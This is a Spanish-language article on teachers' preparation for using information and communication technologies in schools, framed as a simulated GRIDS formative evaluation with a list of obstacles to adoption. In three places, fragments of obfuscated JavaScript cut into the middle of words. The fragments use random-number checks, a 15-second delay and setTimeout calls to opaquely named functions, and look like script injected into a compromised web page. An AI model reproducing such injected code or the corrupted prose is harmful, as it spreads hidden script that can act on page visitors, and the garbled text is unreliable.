LA PREPARACIÓN DEL PROFESORADO EN RELACIÓN A LAS NUEVAS TECNOLOGÍAS

Autora: Milagros García Habernau

INTRODUCCIÓN


          Hoy en día, no se puede negar la importancia que ha cobrado la información como fuente de riqueza para toda la población. La necesidad de convertir esta información en conocimiento depende de las posibilidades de acceder a ella y de la forma en que la trabajemos. En estos momentos, saber leer, escribir y calcular ya no es suficiente para dar respuesta a las necesidades educativas y laborales de cualquier persona, ya que, como explica Abate, M. (2000), la alfabetización ya no es suficiente; incluso en sus formas más domésticas, es necesaria la alfabetización informática. En este sentido, es absurdo no reconocer los beneficios educativos, económicos, sociales y culturales de las Tecnologías de la Información y la Comunicación.


            Como explica Suárez (1998), la sociedad de la información ofrecerá nuevas oportunidades y permitirá que los ciudadanos asuman un papel más activo en la sociedad. A pesar de todo, una diferencia creciente entre los pobres y ricos en información puede conllevar tensiones sociales. Es por todo esto que se debería proporcionar acceso, con espíritu democrático, a toda la información que se publique, ofrecer oportunidades de educación permanente, asegurarnos de que todos los ciudadanos pueden utilizar los ordenadores, tener acceso al equipo y a los sistemas que se requieran y vigilar la identidad cultural en un mundo en rápida evolución.


          Ante el progreso tecnológico, existen consecuencias que el sistema educativo debe asumir, valorar y, consecuentemente, ofrecer respuestas válidas en relación a los cambios socioculturales que se producen y, además, poner en marcha procesos de búsqueda de estrategias para aproximar la práctica educativa a las necesidades sociales que se plantean.


            El presente articulo consiste en una situación simulada basada en el modelo de evaluación formativa GRIDS (Guidelines for Review andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Internal Development in Schools). Existen  múltiples causas (que se exponen en el punto de recogida de información) que  influyen en la integración de las nuevas tecnologías, pero, en este artículo, en el factor q nos vamos a centrar va a ser en la preparación del profesorado y, dependiendo de los resultados, si son positivos o negativos, se procederá siempre con la meta de buscar opciones de mejoras que permitan obtener todas las ventajas que estos medios nos ofrecen.


 


          1ª FASE DE LA EVALUACIÓN.- RECOGIDA DE  INFORMACIÓN DEL OBJETO DE EVALUACIÓN: POCA PREPARACIÓN DEL PROFESORADO


          Son muchos los inconvenientes que influyen en la introducción de las nuevas tecnologías. Entre ellos nombro los siguientes:


-     Gran habilidad de los jóvenes en el manejo técnico: lo manejan mejor que los profesores, que, en  muchas ocasiones, pierden autoridad por su poca seguridad en la materia.


-          No contar con el apoyo de profesionales tecnológicos.


-          Barreras entre la educación formal y no formal.


-          Mal equipamiento de los centros: hay una mala gestión de los fondos.


-          Se hace un gran gasto inicial para poco rendimiento académico.


-          Mejora en los aprendizajes académicos y ayuda en los contenidos de los programas.


-          Repensar el currículo desde la cultura y las nuevas tecnologías audiovisuales.


-          Organización de los contextos de Enseñanza-Aprendizaje.


-          Necesidad de la formación del profesorado.


-          Poca relación entre las asignaturas y los trabajos que se hacen con el ordenador.


-          Hay poca motivación por parte del profesorado.


-          La Administración organiza pocos cursos preparatorios para el profesorado.


-          El uso del ordenador mal planificado favorece el aislamiento en los alumnos, dificultandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el trabajo en equipo.


-          La Administración no dedica suficientes recursos humanos y materiales.


-          Hay demasiadas averías que caen en el olvido, dandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando como resultado la disminución del número de equipos.